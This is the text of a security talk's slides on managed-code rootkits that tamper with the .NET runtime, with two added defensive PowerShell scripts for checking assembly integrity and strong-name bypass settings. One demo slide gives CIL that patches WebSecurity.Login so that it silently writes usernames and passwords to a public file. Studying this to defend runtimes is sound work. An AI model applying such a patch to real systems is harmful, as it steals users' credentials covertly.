How Well Do You Know
Your Runtime?
Rob Gillen
@argodev

This work is licensed under a Creative Commons Attribution 3.0 License.
Don’t Be Stupid
The following presentation describes real
attacks on real systems. Please note that
most of the attacks described would be
considered ILLEGAL if attempted on
machines that you do not have explicit
permission to test and attack. I assume no
responsibility for any actions you perform
based on the content of this presentation
or subsequent conversations.
Please remember this basic guideline: With
knowledge comes responsibility.
Disclaimer
The content of this presentation
represents my personal views and
thoughts at the present time. This
content is not endorsed by, or
representative in any way of my
employer nor is it intended to be a
view into my work or a reflection on
the type of work that I or my group
performs. It is simply a hobby and
personal interest and should be
considered as such.
Credits
Many ideas for this talk are derived from
“Managed Code Rootkits: Hooking Into
Runtime Environments”, Erez Metula,
Syngress, 2011
Some ideas are from “Gray Hat Python”,
Justin Seitz, No Starch, 2009
Other Ideas are from colleagues far
Few ideas are my own
root·kit
/ˈro͞otˌkit/
noun: rootkit; plural noun: rootkits
a set of software tools that enable an
unauthorized user to gain control of a
computer system without being detected.

http://google.com/search?q=define+rootkit
A rootkit is a stealthy type of software,
typically malicious, designed to hide the
existence of certain processes or programs
from normal methods of detection and enable
continued privileged access to a computer.
The term rootkit is a concatenation of
"root" (the traditional name of the
privileged account on Unix operating
systems) and the word "kit" (which refers
to the software components that implement
the tool). The term "rootkit" has negative
connotations through its association with
malware.
http://en.wikipedia.org/wiki/Rootkit
Terminology
• Runtime Environment/Application-Level
Virtual Machine
• Java JVM
• .NET Framework aka Common Language
Runtime (CLR)
• Android Dalvik

• Intermediate Language
• MS IL

• Managed Code
• Java
• C#, VB.NET, F#, etc.
http://www.everbot.com/c-programming-language/
http://http://java.sampleexamples.com/java-is-best-suited-for-internet/
DEMO: Modifying
Default Behavior
.method public hidebysig static bool Login(string userName, string password, [opt] bool persistCookie) cil managed
{
  .param [3] = bool(false)
  // Code size       26 (0x1a)
  .maxstack  2
  .locals init (bool V_0)
  IL_0000:  call       class WebMatrix.WebData.ExtendedMembershipProvider WebMatrix.WebData.WebSecurity::VerifyProvider()
  IL_0005:  pop
  IL_0006:  ldarg.0
  IL_0007:  ldarg.1
  IL_0008:  call       bool [System.Web]System.Web.Security.Membership::ValidateUser(string, string)
  IL_000d:  stloc.0
  IL_000e:  ldloc.0
  IL_000f:  brfalse.s  IL_0018
  IL_0011:  ldarg.0
  IL_0012:  ldarg.2
  IL_0013:  call       void [System.Web]System.Web.Security.FormsAuthentication::SetAuthCookie(string, bool)
  IL_0018:  ldloc.0
  IL_0019:  ret
} // end of method WebSecurity::Login
// OK, let's be a little evil
IL_00XX:  nop
IL_00XX:  ldstr      "C:\\Users\\Public\\mylog.txt"
IL_00XX:  ldarg.0    // get the username
IL_00XX:  ldstr      ","
IL_00XX:  ldarg.1    // get the password
IL_00XX:  ldstr      "\r\n"
// set the data (concatenate the previous strings)
IL_00XX:  call       string System.String::Concat(string, string, string, string)
// write the data
IL_00XX:  call       void [mscorlib]System.IO.File::AppendAllText(string, string)
IL_00XX:  nop
Protection
• Local Runtime?
• Signature Checking?
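Both questions on this slide can be turned into a concrete check that does not rely on the runtime vouching for itself. The PowerShell script below is an added example and is not part of the talk: it records a SHA-256 baseline of the managed assemblies in the Global Assembly Cache on a known-good host, and on later runs flags any assembly whose hash has drifted, that is missing from the baseline, or whose Authenticode signature no longer validates (a patched image such as the Login method above keeps its file name but fails the signature hash check). The GAC root and the baseline file name are assumptions for a .NET Framework 4.x host; adjust them to the runtime you actually run.

```powershell
# Added example, not from the talk. Baseline-and-verify check for the managed
# runtime assemblies. $Root is an assumed location for the .NET Framework 4.x GAC.
param(
    [string]$Root     = "$env:WINDIR\Microsoft.NET\assembly",
    [string]$Baseline = "$PSScriptRoot\runtime-baseline.json",
    [switch]$Record
)

function Get-RuntimeFingerprints {
    param([string]$Path)
    Get-ChildItem -Path $Path -Recurse -Filter *.dll -File |
        ForEach-Object {
            [pscustomobject]@{
                Path      = $_.FullName
                Sha256    = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
                # Valid / NotSigned / HashMismatch / UnknownError ...
                Signature = (Get-AuthenticodeSignature -FilePath $_.FullName).Status.ToString()
            }
        }
}

$current = Get-RuntimeFingerprints -Path $Root

if ($Record) {
    # Record mode: run once on a freshly patched, trusted build; keep the file off the host.
    $current | ConvertTo-Json -Depth 3 | Set-Content -Path $Baseline -Encoding UTF8
    Write-Host "Recorded $($current.Count) assemblies to $Baseline"
    return
}

# Verify mode: compare the live runtime against the recorded baseline.
$known = @{}
foreach ($entry in (Get-Content -Path $Baseline -Raw | ConvertFrom-Json)) {
    $known[$entry.Path] = $entry.Sha256
}

$findings = foreach ($file in $current) {
    # A modified assembly keeps its name (and usually its strong-name blob) but the
    # image no longer matches the Authenticode signature, so Status is not 'Valid'.
    if ($file.Signature -ne 'Valid') {
        [pscustomobject]@{ Path = $file.Path; Issue = "Authenticode status $($file.Signature)" }
    }
    if (-not $known.ContainsKey($file.Path)) {
        [pscustomobject]@{ Path = $file.Path; Issue = 'Not in baseline (new assembly)' }
    } elseif ($known[$file.Path] -ne $file.Sha256) {
        [pscustomobject]@{ Path = $file.Path; Issue = 'SHA-256 differs from baseline' }
    }
}

if ($findings) {
    $findings | Format-Table -AutoSize
    exit 1
}
Write-Host "All $($current.Count) assemblies match the baseline and carry valid signatures."
```

Run it once with `-Record` right after patching, then periodically without the switch. Two caveats follow directly from the talk: Windows servicing legitimately changes these hashes, so re-record the baseline after each framework update; and PowerShell is itself managed code running on the CLR it is inspecting, so on a host where the runtime is suspect the hashes should be computed from a clean boot medium or a separate machine, not from the runtime under test.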
Progress?
Starting with the .NET Framework 3.5 Service
Pack 1, strong-name signatures are not
validated when an assembly is loaded into a
full-trust application domain, such as the
default application domain for the MyComputer
zone. This is referred to as the strong-name
bypass feature. In a full-trust environment,
demands for StrongNameIdentityPermission
always succeed for signed, full-trust
assemblies, regardless of their signature.
The strong-name bypass feature avoids the
unnecessary overhead of strong-name signature
verification of full-trust assemblies in this
situation, allowing the assemblies to load
faster.
http://msdn.microsoft.com/en-us/library/xwb8f617%28v=vs.110%29.aspx
Mixed Success
<configuration>
  <runtime>
    <bypassTrustedAppStrongNames enabled="false" />
  </runtime>
</configuration>
o_O
.method assembly hidebysig static class System.Reflection.RuntimeAssembly
InternalLoadAssemblyName(
class System.Reflection.AssemblyName assemblyRef,
class System.Security.Policy.Evidence assemblySecurity,
class System.Reflection.RuntimeAssembly reqAssembly,
valuetype System.Threading.StackCrawlMark& stackMark,
native int pPrivHostBinder,
bool throwOnFileNotFound,
bool forIntrospection,
bool suppressSecurityChecks) cil managed
{
method logic…
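The config element two slides back disables the bypass for one application; Microsoft also documents a machine-wide switch, the AllowStrongNameBypass DWORD under HKLM\SOFTWARE\Microsoft\.NETFramework (and the Wow6432Node copy on 64-bit Windows). The PowerShell below is an added example, not part of the talk, that reports both settings so an auditor can see whether strong-name verification is even enabled on a host; the config paths it inspects are whatever you pass in.

```powershell
# Added example, not from the talk. Reports whether the strong-name bypass feature
# is disabled machine-wide and in each supplied application config file.
param([string[]]$ConfigPath = @())

function Test-MachineBypassDisabled {
    # Both hives matter on 64-bit Windows. A missing value means bypass is ON (the default).
    $keys = 'HKLM:\SOFTWARE\Microsoft\.NETFramework',
            'HKLM:\SOFTWARE\Wow6432Node\Microsoft\.NETFramework'
    foreach ($k in $keys) {
        $v = (Get-ItemProperty -Path $k -Name AllowStrongNameBypass -ErrorAction SilentlyContinue).AllowStrongNameBypass
        [pscustomobject]@{
            Key                   = $k
            AllowStrongNameBypass = $v
            BypassDisabled        = ($v -eq 0)
        }
    }
}

function Test-ConfigBypassDisabled {
    param([string]$Path)
    # Looks for <configuration><runtime><bypassTrustedAppStrongNames enabled="false" />
    [xml]$cfg = Get-Content -Path $Path -Raw
    $node = $cfg.configuration.runtime.bypassTrustedAppStrongNames
    [pscustomobject]@{
        Config         = $Path
        BypassDisabled = ($null -ne $node -and $node.enabled -eq 'false')
    }
}

Test-MachineBypassDisabled | Format-Table -AutoSize
$ConfigPath | ForEach-Object { Test-ConfigBypassDisabled -Path $_ } | Format-Table -AutoSize
```

Read the result in light of the method signature above: even when both settings say verification is on, the check is performed by the loader inside the runtime, and that loader carries a suppressSecurityChecks switch. These settings are hardening against casual tampering, not detection of a runtime that has already been replaced; the external baseline check belongs alongside them.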
Questions/Contact
Rob Gillen
rob@gillenfamily.net
http://rob.gillenfamily.net
@argodev
